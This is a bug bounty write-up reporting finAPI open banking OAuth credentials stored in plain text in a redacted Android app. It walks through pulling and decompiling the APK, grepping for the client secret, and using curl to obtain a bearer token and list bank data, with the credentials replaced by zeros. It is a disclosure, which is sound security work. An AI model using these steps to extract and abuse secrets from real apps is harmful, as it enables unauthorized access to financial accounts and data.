Written by omespino

WRITE UP – finAPI (Open Banking API) oauth credentials exposed in plain text in Android app 


Introduction:

Hi everyone It’s been a while since my last post but I’m back, I want to tell you a short story about a REDACTED bug bounty program and why you can always check the basic payloads because you will be surprised that sometimes will work. (Never save creds in plain text inside of android application)

If you like Bug Bounty writeups please check my handbook Bug Bounty Write Ups Collection


Report Summary:

Hi REDACTED team, I was able to find the finAPI oauth credentials exposed in plain text in your REDACTED Android application.

Proof of concept:

1.- Get the latest REDACTED Android application, in my case I downloaded it to my phone (connect the phone in debug mode) and then pull out the APK with adb tools. (com.REDACTED.android.main is the APK package name):

omespino@h0st:~# adb pull data/app/com.REDACTED.android.main/base.apk

2.- Then I decompile the APK with the following command apktool:

omespino@h0st:~# apktool d base.apk

3.- Then I just grep for the “client_secret” to get finap url oauth

omespino@h0st:~# grep -ihr --color client_secret ./base | head -1 

<string name="url_finapi_oauth">
https://live.finapi.io/oauth/token?grant_type=client_credentials&amp;client_id=00000000-0000-0000-0000-00000000&amp;client_secret=00000000-0000-0000-0000-00000000
</string>

4.- At this point, anyone could start using finAPI on behalf of your company :

# first we need to get and access token from the fineapi
# findAPI GET tokens documentation https://docs.finapi.io/#post-/oauth/token

omespino@h0st:~# curl -sX POST "https://live.finapi.io/oauth/token?grant_type=client_credentials&client_id=00000000-0000-0000-0000-00000000&client_secret=00000000-0000-0000-0000-00000000" | json_pp

{
   "token_type" : "bearer",
   "expires_in" : 1347,
   "scope" : "all",
   "access_token" : "IlR3byByb2FkcyBkaXZlcmdlZCBpbiBhIHdvb2QgYW5kIEkglyBJIHRvb2sgdGhlIG9uZSBsZXNzIHRyYXZlbGVkIGJ5LCBhbmQgdGhhdCBoYXMgbWFkZSBhbGwgdGhlIGRpZmZlcmVuY2Ui"
}

# then we can use the token to abuse the finAPI and get banks information
# findAPI GET banks documentation https://docs.finapi.io/#get-/api/v1/banks

omespino@h0st:~# curl -H 'Authorization: Bearer IlR3byBy...lcmVuY2Ui' https://live.finapi.io/api/v1/banks | json_pp

{
   "banks" : [
      {
         "supportedDataSources" : [
            "XXXXX_SERVER"
         ],
         "location" : "XX",
         "blz" : "903123123",
         "lastSuccessfulCommunication" : "201X-0X-0X 13:37:00.000",
         "loginFieldUserId" : "Onlinebanking-ID",
         "isCustomerIdPassword" : false,
         "isTestBank" : true,
         "isSupported" : true,
         "name" : "XXX-XXXXXXXsystem"
      },
      -------------- REDACTED -------------


Environment and tools

adb Android Debug Bridge
apktool

Impact

Anyone, could create, get, update, delete, import users / banks / comunications in finAPI on REDACTED findAPI account.

Well, that’s it, share your thoughts, If you have any doubts, comments or suggestions just drop me a line here or on Twitter @omespino, read you later.

LinkedInShares0

Leave a Reply

Your email address will not be published.